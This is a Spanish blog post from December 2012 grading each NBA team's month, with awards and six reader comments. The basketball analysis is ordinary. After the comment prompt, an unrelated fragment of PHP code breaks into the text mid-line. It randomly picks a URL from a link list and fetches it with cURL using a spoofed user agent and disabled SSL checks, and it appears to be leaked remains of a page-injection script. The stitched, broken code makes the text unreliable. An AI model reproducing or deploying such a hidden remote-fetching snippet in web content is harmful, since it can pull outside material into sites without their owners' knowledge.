Informe #2

28 de December de 2012 por TheDeerHunter

¿Quién ha sido quién en el mes de Diciembre? Vemos qué ha pasado desde el anterior informe.

SOBRESALIENTE

Clippers (15-0): El balance lo dice todo. El diferencial defensa-ofensa también. Son el equipo más en forma de la liga y, además, insinúan margen de mejora incorporando algún hombre que les falta. Hay que decir que el calendario ha sido fácil pero se intuye que tampoco hubiera cambiado mucho la cosa contra rivales de mayor entidad.

Thunder (11-2): Que no engañen esas dos derrotas, están a nivel de campeón, arrasando en un calendario incómodo y con alguna victoria menos de lo que merecerían. Un Durant indescriptible y la irrupción de Ibaka tienen la culpa. Martin mantiene el tipo. Si acaso la única sombra es el rendimiento de Perkins, que empieza a chirriar bastante.

Heat (10-3): A la marcha. Las cuentas cuadran. Además un calendario cómodo con únicamente un par de salidas fáciles (y una derrota en ellas). Su mejor noticia es la reincorporación paulatina de Wade y eso es mucho, algunos ya habían empezado a señalarle. El dato increíble son los 250 minutos consecutivos sin una sola falta de LeBron. No comment. 

Knicks (12-4): Antaño diríamos aquello de que casi mejor sin Melo. Hoy, que empieza a oler a MVP, decimos que ganan incluso sin él. Woodson también empieza a sonar con fuerza para el CoY. Si acaso pueden preocuparse de cómo les ha comido Chicago la tostada este mes. Cruce probable, nos tememos.

Warriors (11-4): Decíamos el mes pasado que habían disputado 8 de 14 fuera de casa. Durante este mes la cuenta es 9 de 15. Calendario terrorífico. La gira por el Este fue una gozada y alguna de sus derrotas ha sido más por mala suerte que otra cosa. De las hipotéticas mejoras sólo se ha producido la relativa de Klay. Pueden llegar facilmente otras y Lee puede ser un tapado para las quinielas de ciertos premios.

Pacers (9-4): A lo tonto se meten en la parte alta del cuadro del Este… todo sin Granger, sobra decir. Las causas: calendario plácido pero todo vale, George comienza a parecerse a lo que la mayoría imaginamos y Hibbert está saliendo de las quinielas a mayor bluf del año.

NOTABLE

Spurs (10-5): El mes de la multa-Sternato. Para mí terriblemente injusta, que conste en acta. Quizá este año lo de terminar líderes de la regular sea poco menos que imposible, aunque la palabra “regular” debería de llevar asociada por ley una foto de la espuela y lo verdaderamente imposible es gestionar mejor una plantilla. Es un insulto que alguien pretenda dar lecciones a Popovic de eso.

Bulls (9-5): La cuestión empieza a ser dónde van a estar estos Bulls cuando vuelva Rose o si empezaremos a decir aquello de que viene el coco. La combinación de esta defensa y Rose debería hacer supurar las úlceras a muchos en un hipotético cruce. En un mundo perfecto (sin lesiones) si no serían serios favoritos les faltaría muy poco.

Hawks (9-5): No aprieta mucho la clase media del Este y los Hawks lo agradecen siendo sólidos como pocos. Quitando la excepción del partido que se les escapó ante Cleveland han ganado prácticamente todo lo que tenían que ganar y han perdido lo que podían perder. Malos tiempos para el nombre de Joe Johnson, pues además de su rendimiento en Brooklyn tenemos que los Hawks son mejores en todos los aspectos sin él. Drew suena para CoY y Josh Smith (por enésima vez) para all-star.

Rockets (9-5): Sin la mini-crisis de la segunda semana del mes y el accidente en Canadá el balance daría miedo. El calendario no es que haya sido nada del otro jueves pero empiezan a postularse seriamente para playoffs y la apuesta por Harden y Asik va amortizándose a pasos agigantados.

Blazers (8-5): Mucho pitorreo (y con razón) por lo del talismán Claver pero desde que ocupa la titularidad el balance es 6-1. El pobre falla más que una escopeta de feria pero trabaja. Además del RoY de calle para Lillard, la parejita Hickson-Aldridge comienza a imponer respeto. En este momento miran por el retrovisor a Lakers, Wolves, Jazz, Mavericks… Mucho mérito.

BIEN

Grizzlies (8-6): Balance positivo que sabe a decepción. En diciembre suman un 50% y gracias. Todos han bajado un puntito (Marc, Gay, Conley, Bayless…) y lo notan en el bajón ofensivo experimentado especialmente cuando no cuentan con el chute anímico de la afición de Memphis. 4 de las 6 derrotas de visitante.

Bucks (8-7): Quitando alguna excepción, a cuenta del cortocircuito ocasional de sus mejores hombres, han perdido lo que podían perder y ganado lo que debían ganar. Acarician la parte alta del cuadro del Este y en los últimos partidos se han movido cómodamente en torno al 70%. De paso la calma relativa les da para recuperar piezas para la causa.

Nuggets (8-7): Calendario bastante terrible, unido a la naturaleza irregular de la franquicia. Lo malo es que, al contrario que los Bucks, con este balance se pelea en la cola de playoffs del Oeste, lo bueno es que la cuesta de Enero no será tal para ellos, con 15 de los 18 primeros choques en el Pepsi Center de Denver.

APROBADO

Wolves (7-6): Extraño momento para los Wolves. La incorporación de Love y Ricky no está transmitiendo más que ilusionantes instantes y sensaciones raras. Mientras, sacan las castañas Pekovic, Svhed, Barea… lo que no les da para volver a posiciones de postemporada ni mucho menos para imaginarlos peleando un cruce. Confiamos que todo sea pasajero.

Lakers (7-7): Argumentos hay como para ponerlos a caer de un burro. Practican una defensa indigna de la camiseta que visten y siguen sin entenderse muchas de las soluciones de D’Antoni. El momento de la verdad ha llegado y ya no hay excusas de que no están todos. Lo mejor que se puede decir es que siguen vivos, con toda la que ha caído.

Jazz (7-8): Como parece que deben de estar en zona playoff por decreto ley queda un poso de desconsuelo. La realidad es que no están hechos para partidos de mucho más de 90 puntos y que pocas opciones tienen de plantar cara a Thunder, Heat, Clippers… No están lejos de su objetivo realista, victoria arriba o abajo.

Magic (7-8): Decía mi madre que quien hace lo que puede no está obligado a más. Ahora se lesiona Davis y mala suerte en los últimos partidos, resueltos en el filo. De otra forma hubieran firmado un balance más que digno, un buen juego y un jamás bajar los brazos. Eso siempre hay que valorarlo.

Raptors (6-8): Cuando parecía que nada podía ir a peor, lesión de Bargnani y Lowry mediante, en el instante de peor nivel de juego de todo el curso, Calderón y los suyos encontraron la senda del juego y la victoria. Para ellos mantener el 50% que rondan últimamente sería absolutamente fantástico, aunque lo más normal es que no sea así, no nos engañemos.

SUSPENSO

Celtics (6-8): Estamos ante la peor campaña de la era Rivers. Desde el 93 no veíamos a verdes y amarillos con balance al .50 o peor simultáneamente en Navidad. Nunca se les puede dar por enterrados pero cada vez que se han enfrentado a un equipo medio armado les ha caído un revolcón. Lo bueno es que nadie aprieta las últimas plazas de postemporada en el Este de momento.

Mavericks (5-9): Momento difícil. Vuelve Dirk, pero han ganado sólo un partido de los últimos 8. Del resto, únicamente una victoria contra Houston como equipo en playoffs y más de una paliza recibida. Con Mayo diluido cual azucarillo hace falta más que la mejor versión del alemán para reflotar el barco.

Sixers (5-9): Dura racha de derrotas y una temible gira por el Oeste empezada. La buena noticia es que Holiday sólo se ha perdido 4 partidos y con él ya se ha ganado a Atlanta y Memphis. La mala es que de Bynum sólo hemos visto el patético peinado que se gasta.

Kings (5-9): Negro nubarrón en el futuro de Cousins y con él una buena parte del futuro a corto-medio de la franquicia. En términos deportivos pueden darse con un canto en los dientes por haber obtenido algunas victorias de mucho mérito, especialmente dos contra Blazers, o contra Warriors. El calendario tampoco ha acompañado.

MUY DEFICIENTE

Pistons (5-11): Dicen que mal de muchos consuelo de tontos. Aún hay algunos en peor situación, porque si no igual ni contaban con esas dos victorias ante Wizards que maquillan bastante. Justo cuando empezaba a observarse algún brote verde (Stuckey o Drummond) Monroe comienza a ofrecer su peor baloncesto. Muy pronto a tanquear…

Suns (4-10): Una verdadera lástima, porque quitando los palizones recibidos ante los Clippers les han plantado cara a todos. Además Dudley está empezando a jugar… en proporción inversa a cuanto menos juega Beasley. Injusto, pero los resultados mandan.

Cavs (4-11): Si Irving se sale, lesionado. Waiters coge el tono, a la enfermería. Si vuelven ambos, le toca a Varejao. Los Cavs son uno de los equipos que menos se puede permitir las bajas y uno de los que más las está sufriendo.

Nets (3-10): Nadie se esperaba esta debacle y menos  Mr. Avery Johnson, uno de los técnicos más cuadriculados de la galaxia. Me da que se le va a echar poco de menos por aquellos lares, pero el nivel de tino de Deron Williams y Joe Johnson es para hacérselo mirar y así ni Red Auerbach reencarnado, oiga.

Wizards (3-11): El culo de la liga en casi todos los aspectos, pero sus 3 victorias las han logrado en este tramo. Una tenía que ser contra Miami. Debimos haber apostado 100 pavos por la machada en lugar de tirarlos en la lotería post fin del mundo.

Hornets (3-12): En Nueva Orleans casi cualquier calendario posible es aterrador, pero el que han sufrido ha sido particularmente terrible. Hay cierta sensación de que deberían haber sumado alguna victoria más por nivel de juego. La realidad es que perdieron hasta con Washington. Lo de Robin Lopez no es demasiado normal.

Bobcats (0-15): La cabra tira al monte y estas 16 derrotas consecutivas son más reconocibles que aquel asombroso inicio. Probablemente podrían haberse librado de alguna pero no extrañe que en poco tiempo las derrotas vengan a conciencia.

PREMIOS MENSUALES

MVP: En esta ocasión no creo que haya mucho debate. Melo por un lado y Durant por el otro.

Rookie: Lillard es constante y tiene pinta que lo va a ser todo el año. El mes pasado dejamos a Kidd-Gilchrist y este mes ha clavado su producción, por el contrario el resto de rookies en el Este no ha mejorado especialmente.

Sorpresa: Sólo hay que ver la progresión de Paul George de Noviembre a Diciembre para explicar mucho de la ascensión de los Pacers. Quizá no debería de ser una sorpresa, porque muchos lo esperábamos más pronto que tarde.

Decepción: No sé si serán imaginaciones mías, pero no sé qué les pasó en Turquía el año pasado a los jugadores que ficharon allí en el lockout. Coincido con que en condiciones normales Deron Williams podría ser el base más letal de la competición. Ahora su peligrosidad está muy en entredicho.

Esfuerzo en vano: Pasamos de nombrarle como la sorpresa del mes de noviembre a incluirlo ahora aquí. Más en vano no puede haber sido su producción. Hablamos de Kemba Walker.

Comenta

6 comentarios a esta entrada

  1. simon dice:
    #1

    De acuerdo en todos los equipos y sus notas. poco mas que decir.
    PD: El esfuerzo en vano es para quien??

      Citar

  2. Esteban dice:
    #2

    poner a los cavs como muy deficientes no me parece adecuado

    que iban a perder muchisimos juegos eras obvio, logico y esperado por todos, su campaña se reducia a ver crecer a irving y thompson y ambos han credico bastante, y por otro lado ver como respondian los rookies waiters y zeller, y ambos han estado a la altura de las cirscunstancias, sumado a la explosion de varejao que quiza les permita un trade interesante, creo que su año, es al menos suspenso

    diferente es el caso e los wizards que armaron con fronkout de supuesto buen nivel, con hombres caros y de experiencia a fin de que wall explota y beal sea un dos solido de la liga, sus internos y ariza han estado entre mal y muy mal, wall en su año despegue ni ha jugado y beal, ha estado por debajo de las expectativas

    detroit lo mismo, monroe se ve muy estancado en su rendimiento y aun tienen malos contratos que soportar que no ayudan a reconstruir como stuckey, prince y villanueva, knight no apunta a ser mas que un buen base suplente y drummond pinta para bueno, pero nisiquiera a logrado sacarle el puesto a maxiel

    PERDER es una cosa, pero estar preparado para perder, o disfrutar perdiendo es otra, es la diferencia de estar armado para algo y lo lograrlo y lograrlo, para mi la directiva de los cavs no deben estar nada nerviosa con las derrotas de su equipo, teniendo en cuenta la juventud de sus jugadores y el super espacio salarial que tendran a fin de esta temporada

      Citar

  3. TheDeerHunter dice:
    #3

    @Simon: Kemba Walker, gracias. Llevo una semana despistadísimo.
    @Esteban: Más o menos coincido contigo, pero no valoro su año (que también está siendo malo en resultados) sino el periodo desde el último informe, donde solo han cosechado 4 victorias y han sufrido muchos imprevistos. La plantilla es de las más cortas que hay, pero lo suplen cuando pueden con Irving-Waiters-Varejao. El “cuando pueden” es un detalle fundamental, porque han contado con los 3 muy pocas veces.

      Citar

  4. Esteban dice:
    #4

    tienes toda la razon deer, habia perdido la perspectiva

      Citar

  5. Denise dice:
    #5

    Buen analisis deer.

    Yo lo de los Pistons no lo entiendo. Si miro la plantilla, no creo que tengan tan mal equipo para hacer la mierda de temporada que llevan,..otro año más…. La pareja Monroe-Drummond la querría tener el 90% de los equipos, en caso del rookie, creo que debería jugar mas y de inicio, compartiendo minutos con Monroe. A mi me recuerda a Howard en su año rookie, creo que será un gran pivot.
    Pero después hay jugadores muy aprovechables y talentosos como Knight, Stuckey; Maxiell le pone huevos, Prince todavía da el nivel, Jerebko puede hacer un buen trabajo sucio, Singler está progresando bien, Will Bynum no lo ha hecho mal cuando le dan oportunidades, Daye no me parecía mal jugador pero ahora anda perdido. No sé…me parece un equipo al que los coachs no le estan sabiendo sacar el maximo jugo, mucho talento desperdiciado veo en ese equipo. Es verdad que no tienen equipo para PO, pero tienen mimbres para llevar una mejor marca.

      Citar

  6. Denise dice:
    #6

    Mas pronto hablo de los Pistons, y machacan a los Heat con partidazos de jugadores en el ostracismo como Bynum y Daye..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>